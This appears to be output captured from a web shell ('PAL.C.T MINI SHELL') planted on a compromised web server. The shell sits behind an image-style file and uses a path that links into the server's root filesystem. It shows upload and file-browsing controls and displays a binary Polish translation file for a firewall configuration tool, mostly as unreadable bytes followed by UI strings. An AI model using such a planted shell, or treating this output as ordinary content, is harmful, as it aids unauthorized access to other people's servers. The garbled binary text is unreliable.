php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/pl/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/pl/LC_MESSAGES/system-config-firewall.mo

O
$.6e1
1D
WeH}/XO[gnw	J  	 
 [ I!1"L"5[")")"""
#?#N#-S##
#y#$ $)$>9$x$s$$$%9)%c%<~%9%%6&E&
V&d&q&	&&&&&&!&&&&('*9'd'''7'''(
(("(2(L(\(v(P) *(*.*5*9**+#+6+&J+q+v+|+++++++,	,",*,,--l.i//0	0
0)050;0iT0m0V,1E12
22	22
3/$3T4h4{4444444<4K455&6A76y66g7
w77777777788Q3828*88899999@:/:8;S:;L;E;G!<Oi<K<V=I\=$=====%>
+>9>-?>;m>B>|>i?r?
??	???????@@@-@9A@{@@@@@@@@A=QBCCC
CDQDXD`DJqDDDD
DEEEEE8FMFRF^FcFiFGGHlIJ6KKMM-NKNeN%~NpN$O8:OCsOYObPtPaP5YQdQaQXVRRRSTqUVVcZWFYOZ
UZ
cZnZovZZZ
["[2[[^\k\|\]Z]r]]] ]
]] ]^^B^iV^^^^^^^_
_f*_______``4`?!a1aaaaaaabIcc)e-f%:fF`f fff-f g
4g?gQg)bgDg7g	h
hhhhh	hhhinj=k
CkQkrdkkllQ
m:\m/m6mmnYntn({nn
nnkoooLoohpipqp pDppCqJZq$q>q	r%r6rFrZrcrgrsrxrr+rrrr6s=;s&ysssRs/tFt
\tgtwtttt)ttu
vvvvv!w#w"w x46xkxpxvxxx*x%xyy4ySydyjy5zTzY.{w|}3}
}}}	~~~-~z~a,r#'	K#U
y^1-P~!
I̓_w**8U	~ņ"ʆ"&8R+U_?/!QY
#.=)R|P74BRRSU;C8J|Vnj6PU׍1+71?iCo
]$hȏޏ'&,=QNdӐאݐ"(
6V[hWהޔٕ̕a]} Ė՗8&+7DL"NQ
jdu/! ߡ23(,Obgsʣ>fĤ9+zehsI5ժpGGgP	%İ԰Cذp"9^Sҳ"(
:ERmu5y!1S`fm	t~`$*Ol:E67$n]{.I4TID-R@
DY`'zAH}
G[J35*VG	?6m>1>WZ8/lu~
bUq2?.9#;4%6hBM7Qd;S%^P
p:r)!X$	N/cgiFxe2,9=_o( ('L=kt#a|E<,yK)8"A7CN\C1<BvO"]:H$+Kwj50E n*F&{sL03.&fOJM-+@!
ERROR - You must be root to run %s.%(option)s option requires %(count)s arguments%s is not a valid protocol.%s is not a valid range (start port >= end port).%s option does not take a value%s option requires an argument(modified)<b>Basic Firewall Settings</b><b>Configuration</b><b>Destination</b><b>Information</b><b>Source</b><b>User Skill Level</b><b>Your current configuration is empty, all traffic will be blocked.</b><big><b>Firewall Configuration Wizard</b></big><i>Save on stop</i> and <i>Save on restart</i> additionally save rule and chain counter.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>A <i>"System without network access"</i> does not need a firewall at all. This selection disables the firewall. Otherwise, choose <i>"System with network access"</i>.A firewall allows other computers to access selected services on your computer and helps to prevent unauthorized access beyond these selections. Select the services to which the firewall should allow access.A firewall protects against unauthorized network intrusions. Enabling a firewall blocks all incoming connections. Disabling a firewall allows all connections and is not recommended. AddAdd EntryAdd InterfaceAdd additional ports or port ranges, which need to be accessible for all hosts or networks.Add entries to forward ports either from one port to another on the local system or from the local system to another system. Forwarding to another system is only useful if the interface is masqueraded. Port forwarding is IPv4 only.Address '%s' is not valid.All %s devicesAllow access to necessary ports or port ranges, only.Allow access to necessary services, only.Allow all traffic on the specified deviceAmanda Backup ClientApplyApply changesAuthentication is required to read and modify firewall settingsBackBackwards compatibility, aliased to --enabledBaculaBacula ClientBacula is a network backup solution. Enable this option, if you plan to provide Bacula backup, file and storage services.Be more verboseBeginnerBeginner
ExpertBlock this ICMP type. The default is to accept all ICMP types.CancelClicking the 'Yes' button will override any existing firewall configuration. Are you sure that you want to do this?CloseConfiguration failedConfigure SELinux mode: %sConfigure SELinux type: Usually targeted or strict PolicyConfigure Service SettingsConfigure firewall but do not activate the new configurationConfigure firewall helper modules for connection trackingConfigure firewall rulesConfigure the iptables and ip6tables service settings.Conntrack HelperConverting %sCustom RulesCustom Rules FileCustomizeDNSDefault:DescriptionDesktopDesktop
ServerDestination (at least one needed)Destination UnreachableDisableDisable FirewallDisable Internet Printing Protocol (IPP)Disable Internet Protocol Security (IPsec)Disable Multicast DNS (mDNS)Disable an iptables moduleDisable firewallERROR: FirewallD is active, please use firewall-config.Echo Reply (pong)Echo Request (ping)EditEdit EntryEnableEnable FirewallEnable an iptables moduleEnable firewallEnable firewall (default)Enable this option if you want to allow remote virtual machine management with SASL authentication and encryption (digest-md5 passwords or GSSAPI/Kerberos). The libvirtd service is needed for this option to be useful.Enable this option if you want to allow remote virtual machine management with TLS encryption, x509 certificates and optional SASL authentication. The libvirtd service is needed for this option to be useful.EnabledErrorExpertFTPFTP is a protocol used for remote file transfer. If you plan to make your FTP server publicly available, enable this option. You need the vsftpd package installed for this option to be useful.Failed to remove %s.Failed to start %s.Failed to stop %s.Failed to write %s.Failed to write selinux configuration.FileFile:FilenameFirewallFirewall ConfigurationFirewall Configuration StartupFirewall Configuration WizardFirewall TableFirewall Table:Firewall authorizationFirewall:ForwardForward the port with protocol for the interface to either another local destination port (no destination address given) or to an other destination address with an optional destination port. This is IPv4 only.Forward to another portHTTP is the protocol used to serve Web pages. If you plan to make your Web server publicly available, enable this option. This option is not required for viewing pages locally or developing Web pages.HTTPS is a modified HTTP used to serve Web pages when security is important. Examples are sites that require logins like stores or web mail. This option is not required for viewing pages locally or developing Web pages. You need the httpd package installed for this option to be useful.Here you can define which services are trusted. Trusted services are accessible from all hosts and networks.Hit <i>OK</i> to apply your changes. You do not need to restart the firewall, the changes are effective as soon as they are applied.Hit enter to continue.ICMP FilterICMP TypeIMAP over SSLIP address:IPsecIPv6 has no nat support.If you clear the <i>keep configuration</i> button, the actual firewall configuration will be overwritten.If you enable local forwarding, you have to specify a port. This port has to be different to the source port.If you enable masquerading, IP forwarding will also be enabled for your IPv4 networks.If you need further firewall settings, please modify your configuration by hand, but keep in mind, that this tool is not able to load your custom configuration. If you are using this tool, all your manual changes will be lost. If you do not want to lose your manual configuration changes, leave this program without applying.IgnoreIgnore AllIgnore actual settingsInterfaceInterface '%s' is not valid.Interface:Internet Protocol Security (IPsec) incorporates security for network transmissions directly into the Internet Protocol (IP). IPsec provides methods for both encrypting data and authentication for the host or network it sends to. If you plan to use a vpnc server or FreeS/WAN, do not disable this option.Invalid argument %sKeep ConfigurationKey:List predefined services.List the supported icmp types.LoadLoad _Default ConfigurationLocal forwardingMail (SMTP)Make sure to open the destination port on the remote system.Mark all interfaces as trusted which should have full access to the system.Mark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.Mark the interfaces to be masqueraded.Masquerades traffic from the specified device. This is IPv4 only.MasqueradingMasquerading allows you to set up a host or router that connects your local network to the internet. Your local network will not be visible and the hosts appear as a single address on the internet. Masquerading is IPv4 only.Move Entry DownMove Entry UpMulticast DNS (mDNS)NFS4Network Printing Client (IPP)Network Printing Server (IPP)NoNo configurationNot configuredNumeric status outputOKOld firewall configuration.Only mark interfaces if you can trust all participants on that network interface.Open specific ports in the firewall (e.g, ssh:tcp)Open the firewall for a service (e.g, ssh)OpenVPNOpenVPN is a virtual private network (VPN) solution. It is used to create encrypted point-to-point tunnels between computers. If you plan to provide a VPN service, enable this option.Other PortsPOP-3 over SSLParameter ProblemParse error in config filePlease answer the questions in the following configuration steps. The wizard leads you back to the main application and hides all unnecessary configuration options.Please check your firewall settings after applying custom rules.Please enter a port or port range and protocol.Please enter a valid port number, service name or range.Please load a default configuration from the <i>Options</i> menu or use the wizard.Please remember to check if the services iptables and ip6tables are enabled.Please remember to check your firewall configuration before using it.Please select an entry from the list or enter a interface further down.Please select an entry from the list or enter a port and protocol further down.Please select keep configuration or choose to load a default configuration.Please select the protocol type, the firewall table and the file containing the rules.Please select the source and destination options according to your needs.Please specify your firewall skills.PortPort / Port Range:Port ForwardingPort and ProtocolPort or port range '%s' is not valid.Port/ProtocolPort:Predefined Services with Default Environment:Print a counter/number for every rule in the status output.Print addresses and ports in numeric format for the status output.Print information about the number of packets and bytes plus the <i>input-</i> and <i>outputdevice</i> in the status output.ProtocolProtocol '%s' is not valid.Protocol TypeProtocol Type:Protocol:QuitRADIUSRed Hat Cluster SuiteRedirectReloadReload current configurationRemoveRemove EntryRouter AdvertisementRouter SolicitationRun noninteractively; process only command-line argumentsSELinux Options (deprecated)SSHSambaSamba ClientSave and restore counterSave on restartSave on stopSave the active firewall configuration with all changes since the last start before restarting the firewall. Only do this if you need to preserve the active state for the next start.Save the active firewall configuration with all changes since the last start before stopping the firewall. Only do this if you need to preserve the active state for the next start.Secure Shell (SSH) is a protocol for logging into and executing commands on remote machines. It provides secure encrypted communications. If you plan on accessing your machine remotely via SSH over a firewalled interface, enable this option. You need the openssh-server package installed for this option to be useful.Secure WWW (HTTPS)SelectSelect <i>"Expert"</i> if you are familiar with firewall configurations or if you need to add user customized rules. Otherwise, choose <i>"Beginner"</i>.Select a FileServerServiceService SettingsSet firewall default type: %s. This overwrites any existing configuration.Show this help messageShow versionSource (all needed)Source QuenchSpecify a custom rules file for inclusion in the firewall, after the default rules. Default protocol type: ipv4, default table: filter. (Example: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Start WizardStart configuration wizardStatus line numbersSupported icmp types:System without network access
System with network accessTFTPTFTP ClientTODOTableThe Amanda backup client option allows you to connect to a Amanda backup and archiving server. You need the amanda-client package installed for this option to be useful.The Domain Name System (DNS) is used to provide and request host and domain names. Enable this option, if you plan to provide a domain name service (e.g. with bind).The Internet Message Access Protocol over SSL (IMAPs) allows a local client to access email on a remote server in a secure way. If you plan to provide a IMAP over SSL service (e.g. with dovecot), enable this option.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over tcp) provides the ability to share printers over the network. Enable this option if you plan to share printers via cups over the network.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over udp) provides the ability to get information about a printer (e.g. capability and status) and to control printer jobs. If you plan to use a remote network printer via cups, do not disable this option.The NFS4 protocol is used to share files via TCP networking. You will need to have the NFS tools installed and properly configure your NFS server for this option to be useful.The Post Office Protocol version 3 (POP3) is a protocol to retrieve email from a remote server over a TCP/IP connection. Enable this option, if you plan to provide a POP3 service (e.g. with dovecot).The Remote Authentication Dial In User Service (RADIUS) is a protocol for user authentication over networks. It is mostly used for modem, DSL or wireless user authentication. If you plan to provide a RADIUS service (e.g. with freeradius), enable this option.The Trivial File Transfer Protocol (TFTP) is a protocol used to transfer files to and from a remote machine in s simple way. It is normally used only for booting diskless workstations and also to transfer data in the Preboot eXecution Environment (PXE).The file '%s' does not exist.The firewall configuration is not consistent.The firewall is disabled.The firewall is enabled.The firewall table '%s' is not valid.The following files are missing or unusable:
	%s

Apply your firewall configuration now to correct this problem.The protocol type '%s' is not valid.There are unapplied changes, do you really want to quit?This error message informs a host to send packets on another route.This error message is generated by a host or gateway if the destination is not reachable.This error message is generated if the IP header is bad, either by a missing option or bad length.This error message is generated if the time-to-live was exceeded either of a packet or of the reassembling of a fragmented packet.This error message is generated to tell a host to reduce the pace at which it is sending packets.This message is the answer to an <i>Echo Request</i>.This message is used by a host attached to a multicast link to request a <i>Router Advertisement</i>This message is used by routers to periodically announce the IP address of a multicast interface.This message is used to test if a host is reachable mostly with the <i>ping</i> utility.This option allows a Bacula server to connect to the local machine to schedule backups. You need the bacula-client package installed for this option to be useful.This option allows incoming SMTP mail delivery. If you need to allow remote hosts to connect directly to your machine to deliver mail, enable this option. You do not need to enable this if you collect your mail from your ISP's server by POP3 or IMAP, or if you use a tool such as fetchmail. Note that an improperly configured SMTP server can allow remote machines to use your server to send spam.This option allows you to access Trivial File Transfer Protocol (TFTP) servers. You need the tftp package installed for this option to be useful.This option allows you to access Windows file and printer sharing networks. You need the samba-client package installed for this option to be useful.This option allows you to access and participate in Windows file and printer sharing networks. You need the samba package installed for this option to be useful.This option allows you to use the Red Hat Cluster Suite. Ports are opened for openais, ricci and dlm. You need the Red Hat Cluster Suite installed for this option to be useful.This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.This program will help you to set up a basic firewall for your system.This wizard helps you to set up a clean firewall configuration for your system.Time ExceededTo AddressTo PortTo ensure a sane state, the kernel firewall modules must be unloaded when the firewall is restarted or stopped.Trusted InterfacesTrusted ServicesTypeUnload modules on restart and stopUpdate firewall non-interactively if the firewall is enabled. This will also restart the firewall. The -n and -f options will be ignored.Use custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.User DefinedUser Skill LevelUsing these options with no additional firewall options will not create or alter firewall configuration, only SELinux will be configured.Valid values: %sValid values: <port>[-<port>], where port is either a number [0..65535] or a service name.Valid values: tcp, udpVerbose statusVirtual Machine ManagementVirtual Machine Management (TLS)WWW (HTTP)WarningWhat kind of system do you have?WizardYesYou can change the settings in the <i>Options</i> menu afterwards.Your firewall configuration was converted from an old version. Please verify the configuration and apply.[<type>:][<table>:]<filename>_About_File_Help_Options_Quit_Start Configuration Wizardconfigurationif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]invalid interface '%s'.invalid port definition %s.invalid service '%s'.ipv6 has no nat support.localmDNS provides the ability to use DNS programming interfaces, packet formats and operating semantics in a small network without a conventional DNS server. If you plan to use Avahi, do not disable this option.modified labelno such option: %soption %(option)s: invalid forward_port '%(value)s'.option %(option)s: invalid forward_port '%(value)s': %(error)s.option %(option)s: invalid icmp type '%(value)s'.port range %s is not unique.system-config-firewalltranslator-creditsyesFirewall ConfigurationyesMark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.yesThe Internet Control Message Protocol (ICMP) is mainly used to send error messages between networked computers, but additionally for informational messages like ping requests and replies.yesUse custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.Project-Id-Version: system-config-firewall
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2011-02-16 16:32+0200
PO-Revision-Date: 2013-11-20 09:28+0000
Last-Translator: Piotr Drąg <piotrdrag@gmail.com>
Language-Team: Polish (http://www.transifex.com/projects/p/system-config-firewall/language/pl/)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: pl
Plural-Forms: nplurals=3; plural=(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2);

BŁĄD - tylko root może uruchomić %s.Opcja %(option)s wymaga %(count)s parametrów%s nie jest prawidłowym protokołem.%s nie jest prawidłowym zakresem (port początkowy >= port końcowy).Opcja %s nie przyjmuje wartościOpcja %s wymaga parametru(zmodyfikowano)<b>Podstawowe ustawienia zapory sieciowej</b><b>Konfiguracja</b><b>Cel</b><b>Informacja</b><b>Źródło</b><b>Poziom umiejętności użytkownika</b><b>Obecna konfiguracja jest pusta, cały ruch będzie blokowany.</b><big><b>Kreator konfiguracji zapory sieciowej</b></big><i>Zapisanie podczas zatrzymywania</i> i <i>Zapisanie podczas ponownego uruchamiania</i> dodatkowo zapisują reguły i licznik łańcuchów.<typ ICMP><interfejs><tryb><moduł><port>[-<port>]:<protokół><usługa><typ><i>"System bez dostępu do sieci"</i> nie potrzebuje zapory sieciowej. Wybranie tej opcji wyłączy zaporę. W przeciwnym wypadku należy wybrać <i>"System z dostępem do sieci"</i>.Zapora sieciowa pozwala innym komputerom na dostęp do wybranych usług na tym komputerze i zapobiega nieupoważnionemu dostępu z zewnątrz. Proszę wybrać usługi, które zapora powinna udostępniać.Zapora sieciowa chroni przed nieupoważnionym dostępem z zewnątrz. Włączenie zapory blokuje wszystkie połączenia przychodzące. Wyłączenie jej pozwala na wszystkie połączenia i nie jest zalecane. DodajDodanie wpisuDodanie interfejsuMożna dodać dodatkowe porty lub zakresy portów, które mają być dostępne dla wszystkich komputerów i sieci.Można dodać wpisy, aby przekierowywać porty w obrębie lokalnego systemu lub z lokalnego systemu do innego. Przekierowanie do innego systemu jest przydatne tylko, jeśli interfejs jest za maskaradą. Przekierowanie portów działa tylko dla IPv4.Adres "%s" jest nieprawidłowy.Wszystkie urządzenia %sNależy pozwolić na dostęp tylko do niezbędnych portów lub zakresów portów.Należy pozwolić na dostęp tylko do niezbędnych usług.Pozwolenie na cały ruch na podanym urządzeniuKlient narzędzia do tworzenia kopii zapasowych AmandaZastosujZastosowuje zmianyWymagane jest uwierzytelnienie, aby odczytać i zmodyfikować ustawienia zapory sieciowejWsteczZgodność wsteczna, alias dla --enabledBaculaKlient BaculaBacula jest umożliwia wykonywanie kopii zapasowych przez sieć. Należy włączyć tę opcję, jeśli planowane jest wykorzystywanie usług wykonywanie kopii zapasowych Bacula.Więcej szczegółówPoczątkującyPoczątkujący
ZaawansowanyZablokowanie tego typu ICMP. Domyślnie wszystkie typy ICMP są akceptowane.AnulujNaciśnięcie przycisku "Tak" zastąpi istniejącą konfigurację zapory sieciowej. Na pewno to zrobić?ZamknijKonfiguracja nie powiodła sięKonfiguracja trybu SELinuksa: %sKonfiguracja typu SELinuksa: zwykle polityka skierowana lub ścisłaSkonfiguruj ustawienia usługiKonfiguracja zapory sieciowej, ale bez aktywacji nowej konfiguracjiSkonfiguruj moduły pomocnicze zapory sieciowej od śledzenia połączeniaKonfiguracja reguł zapory sieciowejProszę skonfigurować ustawienia usług iptables i ip6tables.Moduł pomocniczy conntrackKonwertowanie %sWłasne regułyWłasny plik regułDostosujDNSDomyślnie:OpisStacja roboczaStacja robocza
SerwerDocelowe (wymagana jest przynajmniej jedna)Cel jest nieosiągalnyWyłączWyłącz zaporę sieciowąWyłączenie Internetowego protokołu drukowania (IPP)Wyłączenie Internetowego protokołu bezpieczeństwa (IPsec)Wyłączenie multikastowego DNS (mDNS)Wyłączenie modułu iptablesWyłączenie zapory sieciowejBŁĄD: usługa FirewallD jest aktywna, proszę użyć narzędzia firewall-config.Odpowiedź echa (ping)Żądanie echa (ping)ZmodyfikujZmodyfikuj wpisWłączWłącz zaporę sieciowąWłączenie modułu iptablesWłącza zaporę sieciowąWłączenie zapory sieciowej (domyślnie)Włączenie tej opcji umożliwia zdalne zarządzanie maszynami wirtualnymi za pomocą uwierzytelniania i szyfrowania SASL (hasła digest-md5 lub GSSAPI/Kerberos). Wymagana jest usługa libvirtd, aby użyć tej opcji.Włączenie tej opcji umożliwia zdalne zarządzanie maszynami wirtualnymi za pomocą szyfrowania TLS, certyfikatów X.509 i opcjonalnie uwierzytelniania SASL. Wymagana jest usługa libvirtd, aby użyć tej opcji.WłączonaBłądZaawansowanyFTPFTP jest protokołem używanym do zdalnego przesyłania plików. Jeśli planowane jest publiczne udostępnianie serwera FTP, należy włączyć tę opcję. Aby skorzystać z tej opcji musi być zainstalowany pakiet vsftpd.Usunięcie %s nie powiodło się.Uruchomienie %s nie powiodło się.Zatrzymanie %s nie powiodło się.Zapisanie %s nie powiodło się.Zapisanie konfiguracji SELinuksa nie powiodło się.PlikPlik:Nazwa plikuZapora sieciowaKonfiguracja zapory sieciowejUruchamianie konfiguracji zapory sieciowejKreator konfiguracji zapory sieciowejTablica zapory sieciowejTablica zapory sieciowej:Upoważnienie zapory sieciowejZapora sieciowa:DalejPrzekierowanie portu za pomocą protokołu dla interfejsu do innego lokalnego portu docelowego (nie podano adresu docelowego) lub innego adresu docelowego z opcjonalnym portem docelowym. Tylko dla IPv4.Przekierowanie do innego portuHTTP jest protokołem używanym do udostępniania stron WWW. Jeśli planowane jest publiczne udostępnienie serwera, należy włączyć tę opcję. Nie jest ona wymagana, aby lokalnie wyświetlać lub tworzyć strony.HTTPS jest zmodyfikowanym protokołem HTTP używanym do udostępniania stron WWW, kiedy ważne jest bezpieczeństwo. Przykładem są witryny wymagające logowania, jak sklepy lub skrzynki e-mail. Ta opcja nie jest wymagana, aby oglądać lub tworzyć strony lokalnie. Aby móc korzystać z tej usługi wymagane jest zainstalowanie pakietu httpd.Tutaj można określić zaufane usługi. Oznacza to, że te usługi będą dostępne ze wszystkich komputerów i sieci.Proszę nacisnąć przycisk <i>OK</i>, aby zastosować zmiany. Nie ma potrzeby ponownie uruchamiać zapory sieciowej, zmiany zostaną uwzględnione od razu od zastosowania.Proszę nacisnąć klawisz Enter, aby kontynuować.Filtr ICMPTyp ICMPIMAP przez SSLAdres IP:IPsecIPv6 nie obsługuje NAT.Jeśli przycisk <i>Zatrzymanie konfiguracji</i> zostanie wyczyszczony, aktualna konfiguracja zapory sieciowej zostanie zastąpiona.Jeśli włączone zostanie lokalne przekierowanie, należy podać port. Ten port musi być różny od portu źródłowego.Jeśli maskarada zostanie włączona, przekierowanie IP będzie także włączone dla sieci IPv4.Jeśli wymagane są dalsze ustawienia zapory sieciowej, proszę zmodyfikować konfigurację ręcznie, ale należy pamiętać, że to narzędzie nie potrafi wczytać ręcznej konfiguracji. Jeśli używane jest to narzędzie, wszystkie ręczne zmiany zostaną utracone. Aby nie utracić ręcznych zmian w konfiguracji, należy opuścić ten program bez zastosowywania ich.ZignorowanieZignorowanie wszystkiegoZignorowanie właściwych ustawieńInterfejsInterfejs "%s" jest nieprawidłowy.Interfejs:Internetowy protokół bezpieczeństwa (IPsec) wprowadza bezpieczeństwo przesyłania danych w sieci bezpośrednio do Protokołu internetowego (IP). IPsec umożliwia szyfrowanie danych i uwierzytelnianie komputera lub sieci, do której dane są wysyłane. Jeśli planowane jest używanie serwera vpnc lub FreeS/WAN, nie należy wyłączać tej opcji.Nieprawidłowy parametr %sZatrzymanie konfiguracjiKlucz:Wyświetla listę wcześniej określonych usług.Wyświetla listę obsługiwanych typów ICMP.WczytajWczytaj _domyślną konfiguracjęLokalne przekierowaniePoczta (SMTP)Proszę upewnić się, że port docelowy na zdanym systemie jest otwarty.Można zaznaczyć wszystkie zaufane interfejsy, które powinny mieć pełny dostęp do systemu.Można zaznaczyć typy ICMP na liście, które powinny być odrzucane. Wszystkie inne typy ICMP będą mogły przechodzić przez zaporę sieciową. Domyślnie nie ma ograniczeń.Można zaznaczyć interfejsy do maskarady.Maskaraduje ruch z podanego urządzenia. Tylko dla IPv4.MaskaradaMaskarada umożliwia ustawienie komputera lub routera łączącego lokalny komputer z Internetem. Lokalna sieć nie będzie widoczna i będzie występować w Internecie jako jeden adres. Maskaradę można ustawić tylko dla IPv4.Przenieś wpis w dółPrzenieś wpis w góręMultikastowy DNS (mDNS)NFS4Klient drukowania sieciowego (IPP)Serwer drukowania sieciowego (IPP)NieBrak konfiguracjiNieskonfigurowaneNumeryczne wyjście stanuOKStara wersja konfiguracja zapory sieciowej.Należy zaznaczyć tylko te interfejsy sieciowe, w których wszystkim uczestnikom można ufać.Otwarcie podanych portów przez zaporę sieciową (np. ssh:tcp)Otwarcie zapory sieciowej dla usługi (np. ssh)OpenVPNOpenVPN to prywatna sieć wirtualna (VPN). Jest używana do tworzenia szyfrowanych tuneli punkt-punkt między komputerami. Jeśli planowane jest dostarczanie usługi VPN, należy włączyć tę opcję.Inne portyPOP3 przez SSLProblem z parametremBłąd przetwarzania w pliku konfiguracjiProszę odpowiedzieć na pytania z następnych kroków konfiguracji. Kreator przeprowadzi następnie z powrotem do głównej aplikacji i ukryje wszystkie niepotrzebne opcje konfiguracji.Proszę sprawdzić ustawienia zapory sieciowej po zastosowaniu własnych reguł.Proszę podać port lub zakres portów i protokół.Proszę podać prawidłowy numer portu, nazwę usługi lub zakres.Proszę wczytać domyślną konfigurację z menu <i>Opcje</i> lub użyć kreatora.Proszę pamiętać o sprawdzeniu, czy usługi iptables i ip6tables są włączone.Proszę pamiętać, aby sprawdzić konfigurację zapory sieciowej przed jej użyciem.Proszę wybrać wpis z listy lub podać interfejs poniżej.Proszę wybrać wpis z listy lub podać port i protokół poniżej.Proszę wybrać zatrzymanie obecnej konfiguracji lub wczytanie domyślnej.Proszę wybrać typ protokołu, tablicę zapory sieciowej i plik zawierający reguły.Proszę wybrać wymagane opcje źródłowe i docelowe.Proszę podać umiejętności użytkownika w zakresie obsługi zapory sieciowej.PortPort/zakres portów:Przekierowanie portówPort i protokółPort lub zakres portów "%s" jest nieprawidłowy.Port/protokółPort:Wcześniej określone usługi w domyślnym środowisku:Wyświetla licznik/numer dla każdej reguły na wyjściu stanu.Wyświetla adresy i porty w formacie numerycznym na wyjściu stanu.Wyświetla informacje o liczbie pakietów i bajtów plus <i>input-</i> i <i>outputdevice</i> na wyjściu stanu.ProtokółProtokół "%s" jest nieprawidłowy.Typ protokołuTyp protokołu:Protokół:ZakończRADIUSRed Hat Cluster SuitePrzekierowanieWczytaj ponowniePonownie wczytuje obecną konfiguracjęUsuńUsunięcie wpisuOgłaszanie routeraProśba do routeraUruchamianie nieinteraktywne, przetwarzanie tylko parametrów wiersza poleceńOpcje SELinuksa (przestarzałe)SSHSambaKlient SambyZapisanie i przywrócenie licznikaZapisanie podczas ponownego uruchamianiaZapisanie podczas zatrzymywaniaZanim zapora zostanie ponownie uruchomiona, należy zapisać aktywną konfigurację zapory sieciowej razem ze wszystkimi zmianami od ostatniego uruchomienia. Należy to zrobić tylko, jeśli wymagane jest zachowanie aktywnego stanu do następnego uruchomienia.Zanim zaporę zostanie zatrzymana, należy zapisać aktywną konfigurację zapory sieciowej razem ze wszystkimi zmianami od ostatniego uruchomienia. Należy to zrobić tylko, jeśli wymagane jest zachowanie aktywnego stanu do następnego uruchomienia.Bezpieczna powłoka (SSH) jest protokołem pozwalającym na logowanie i wykonywanie poleceń na zdalnym komputerze. Pozwala na bezpieczną, szyfrowaną komunikację. Jeśli planowane jest logowanie na ten komputer przez SSH przez zaporę sieciową, należy włączyć tę opcję. Aby móc skorzystać z tej opcji, musi być zainstalowany pakiet openssh-server.Bezpieczne WWW (HTTPS)WybórNależy wybrać <i>"Zaawansowany"</i>, jeśli użytkownik jest zaznajomiony z konfiguracją zapory sieciowej lub mają zostać dodawane reguły dostosowane przez użytkownika. W przeciwnym wypadku należy wybrać <i>"Początkujący"</i>.Wybór plikuSerwerUsługaUstawienia usługiUstawienie domyślnego typu zapory sieciowej: %s. Zastąpi to każdą istniejącą konfigurację.Wyświetla ten komunikat pomocyWyświetla wersjęŹródłowe (wszystkie wymagane)Gaszenie źródłaMożna podać własny plik reguł do dołączenia do zapory po domyślnych regułach. Domyślny typ protokołu: ipv4, domyślna tablica: filter (przykład: ipv4:filter:/etc/sysconfig/ipv4_filter_addon).Uruchom kreatoraUruchamia kreatora konfiguracjiLiczby wiersza stanuObsługiwane typy ICMP:System bez dostępu do sieci
System z dostępem do sieciTFTPKlient TFTPDo zrobieniaTablicaOpcja klienta narzędzia do tworzenia kopii zapasowych Amanda umożliwia połączenie do serwera kopii zapasowych i archiwizowania Amanda. Aby skorzystać z tej opcji, musi być zainstalowany pakiet amanda-client.System nazw domen (DNS) jest używany do dostarczania i żądania nazw domen. Należy włączyć tę opcję, jeśli planowane jest dostarczanie usługi nazw domen (np. za pomocą programu bind).Internetowy protokół dostępu do wiadomości przez SSL (IMAPs) pozwala lokalnemu klientowi na dostęp do e-maili na zdalnym serwerze w bezpieczny sposób. Jeśli planowane jest dostarczanie usługi IMAP przez SSL (np. za pomocą programu dovecot), należy włączyć tę opcję.Internetowy protokół drukowania (IPP) jest używany do rozproszonego drukowania. IPP (przez TCP) dostarcza możliwość współdzielenia drukarek przez sieć. Jeśli planowane jest współdzielenie drukarki przez CUPS w sieci, należy włączyć tę opcję.Internetowy protokół drukowania (IPP) jest używany do rozproszonego drukowania. IPP (przez UDP) dostarcza możliwość uzyskania informacji o drukarce (np. o jej możliwościach i stanie) oraz kontrolowanie zadań drukowania. Jeśli planowane jest używanie zdalnej drukarki sieciowej przez CUPS, nie należy wyłączać tej opcji.Protokół NFS4 jest używany do współdzielenia plików przez sieć TCP. Aby skorzystać z tej usługi, muszą być zainstalowane narzędzia NFS i prawidłowo skonfigurowany serwer NFS.Trzecia wersja Protokołu pocztowego (POP3) służy do odbierania e-maili ze zdalnego serwera przez połączenie TCP/IP. Należy włączyć tę opcję, jeśli planowanie jest dostarczanie usługi POP3 (np. za pomocą programu dovecot).Usługa zdalnego uwierzytelniania użytkownika wdzwaniania (RADIUS) jest protokołem do uwierzytelniania użytkowników przez sieć. Jest używany głównie przez uwierzytelnianie użytkowników połączeń modemowych, DSL lub bezprzewodowych. Jeśli planowane jest dostarczanie usługi RADIUS (np. za pomocą programu freeradius), należy włączyć tę opcję.Trywialny protokół przesyłania plików (TFTP) jest protokołem używanym do przesyłania plików do i ze zdalnego komputera w prosty sposób. Jest zwykle używany tylko do uruchamiania stacji roboczych bez dysków, ale także do przesyłania danych w środowiskach PXE.Plik "%s" nie istnieje.Konfiguracja zapory sieciowej nie jest spójna.Zapora sieciowa jest wyłączona.Zapora sieciowa jest włączona.Tablica zapory sieciowej "%s" jest nieprawidłowa.Następujące pliki nie istnieją lub są nieużywalne:
	%s

